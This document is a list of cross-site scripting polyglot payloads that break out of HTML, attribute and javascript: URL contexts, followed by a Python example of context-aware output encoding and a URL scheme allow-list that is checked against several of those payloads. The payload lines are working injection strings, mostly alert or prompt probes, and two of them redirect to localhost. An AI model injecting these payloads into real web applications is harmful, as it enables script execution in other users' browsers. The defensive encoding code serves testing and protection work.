javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>
```
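Per-context output encoding checked against the page's own XSS test strings, as an added example that is not part of the original page or any project's code. The polyglots above work by breaking out of whichever context they land in (text, quoted attribute, `javascript:` URL), so the fragment builder below encodes each context separately and allow-lists the href scheme after normalising the way browsers do; the helper names, the sample list and the scheme allow-list are this example's own choices.

```python
import html
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed from the page's XSS basic tests plus two of its polyglot lines.
SAMPLES = [
    '" onclick=alert() a="',
    '\'"><img src=x onerror=alert(1) />',
    "javascript:alert()",
    'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template>'
    '</noembed></script><html \\" onmouseover=/*<svg/*/onload=alert()//>',
    "\njaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//",
]

# Schemes an <a href> may carry; "" covers relative URLs.
SAFE_SCHEMES = {"", "http", "https", "mailto"}


def encode_text(value: str) -> str:
    """HTML text context: & < > " ' become entities, so no closing tag in the
    payload (</title>, </script>, ...) can end the surrounding element."""
    return html.escape(value, quote=True)


def encode_attr(value: str) -> str:
    """Quoted attribute context: same entity set; with the quotes encoded,
    `" onclick=alert() a="` can no longer terminate the attribute value."""
    return html.escape(value, quote=True)


def safe_href(url: str) -> Optional[str]:
    """URL context: encoding alone is not enough, because `javascript:` is
    ordinary attribute text. Normalise as browsers do (drop leading/trailing
    C0 controls and spaces, then embedded tab/CR/LF) and allow-list the scheme."""
    cleaned = re.sub(r"^[\x00-\x20]+|[\x00-\x20]+$", "", url)
    cleaned = re.sub(r"[\t\r\n]", "", cleaned)
    try:
        scheme = urlparse(cleaned).scheme.lower()
    except ValueError:  # e.g. malformed IPv6 brackets: treat as rejected
        return None
    if scheme not in SAFE_SCHEMES:
        return None
    return encode_attr(cleaned)


def render_link(text: str, href: str) -> str:
    """Builds an <a> from untrusted text and URL; a rejected URL renders the
    text with no href at all rather than falling back to the raw value."""
    safe = safe_href(href)
    if safe is None:
        return f"<span>{encode_text(text)}</span>"
    return f'<a href="{safe}">{encode_text(text)}</a>'


def is_inert(markup: str) -> bool:
    """Verification helper: the fragment has exactly the shape render_link
    emits, no extra tag opened, and no javascript: scheme left in the href."""
    m = re.fullmatch(r'<a href="([^"<>]*)">[^<>]*</a>|<span>[^<>]*</span>', markup)
    return m is not None and not re.search(r"javascript:", m.group(1) or "", re.I)
```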